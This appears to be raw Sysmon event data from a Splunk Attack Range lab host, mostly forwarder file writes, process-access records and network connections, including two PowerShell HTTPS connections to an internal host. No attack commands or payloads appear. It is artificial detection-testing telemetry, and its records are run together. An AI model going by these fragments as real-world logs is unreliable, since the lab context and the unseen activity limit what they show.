Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE579678AE4A380CE60FE36FAF494858,SHA256=D454540B829361BAE8326F6BACAB2315169852ED17283B1C191E8A569629C5C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:10.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3689514B1A0CF73534AB90A328A551D3,SHA256=17EFF4E429BC1BB3536BC3B0235B344A8F0298D2EDC138DCB01A6047B9A5DEE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:11.587{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B51C407437DDFF7DA19786B399D8A43,SHA256=2B8A80C2D5C9B6F615B5E2AAAC38FC3A3CA9BE3D0059E3F7C97B8D6F8ECB99B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:37.091{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52488-false10.0.1.12-8000- 23542300x800000000000000035342961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:12.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20AC234F1875C0A22F25BAEC241C021D,SHA256=94B781272185C41F37B50F7C7A3BC3C027C3B7786E39BEA14FEE9726B1D98136,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:13.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60C0B52F153B9B82EA431EB882F4D7E,SHA256=ABE2422CB152DDB1F96960972A5B1E1193C0370152010EFBC0963B81B4FC4DD1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:13.020{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:14.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22E5D62A986CD77BFBA5B8A8E1973CEE,SHA256=FD6A95517095F321702B61734A2DB0FBCD38D4B8D49FE67AED0DBE0446868FF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:40.804{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52489-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:15.654{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7566FAD5C60FA41439B1B2528A809703,SHA256=B06DF7FE9ED417D9933995552F5C9CCFC35C862EC7C0233C520C7B9730FBE37E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:15.001{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F10F83CA3F991576602CDF9890D379F9,SHA256=5B7B640E35F7B370C9BBF3BFFFE26BD554C0FDEC5FA3BA76FE58165A0D33B970,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:16.668{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F591218CC8785D6AB947D7B8AF469ADE,SHA256=E07982FFD1407FBAF50A2624BFA7B53AD712F0396962BF420E2A6C606EA0F364,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:43.118{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52490-false10.0.1.12-8000- 23542300x800000000000000035342977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16506F8B65FE156988CA6A403D3AD930,SHA256=8265C42F61F5776B87286E0B48CDE605632874954731EAF3C08C7BCB362E5DE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7379-613B-47B4-03000000C801}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7379-613B-47B4-03000000C801}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.399{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7379-613B-47B4-03000000C801}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:17.385{B81B27B7-7379-613B-47B4-03000000C801}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=01AF926B4E6C1A2964EA850EB5F1B43C,SHA256=49C54EBDF3C10BAAFE72305CAF0B69EF0F25A747238BE5E1A148ECD5FC78F307,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10896F691995C598C05166B49F4C383D,SHA256=C427A9F5EB86DF4BC9ABC1ECE3C1C2DC1928A4516EABD6D9DAA2951E7129BFDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BB6E963F618E62A5B11FCB1795342FC,SHA256=CE34EF3689012F7791BD6521B316AC2FBD8F7FB60D30DDC7A1B3522BBDD315A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.618{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C65B1DB2CAB070177B00FBBAC5590EE0,SHA256=DB6D077AAC9F8E1A810489DCAD8F0198C741D70A1E14A8EB70B49444FB008582,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.253{B81B27B7-737A-613B-48B4-03000000C801}29841040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-737A-613B-48B4-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-737A-613B-48B4-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.084{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-737A-613B-48B4-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:18.069{B81B27B7-737A-613B-48B4-03000000C801}2984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:19.752{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75022200B1244B96FEE59DD1F0CF7B70,SHA256=39C41BAAE557EB81A40B8945A7289E34336B1920FD4BEABED8AB36FDB406C7FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:44.818{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52491-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:20.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D0EC23EF48E3A9273291279DE1975B,SHA256=BEE3B95A233CEBDD23311AFAB0CE6D770160A688FBCC0180A8B91967F017B8FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:21.783{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5332E6107E392E476BDD45A2FCB2B303,SHA256=A490ED1F930FFCCA0135BEEB7BBA44CE0429282A91A21AF43B3822DB92733C4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 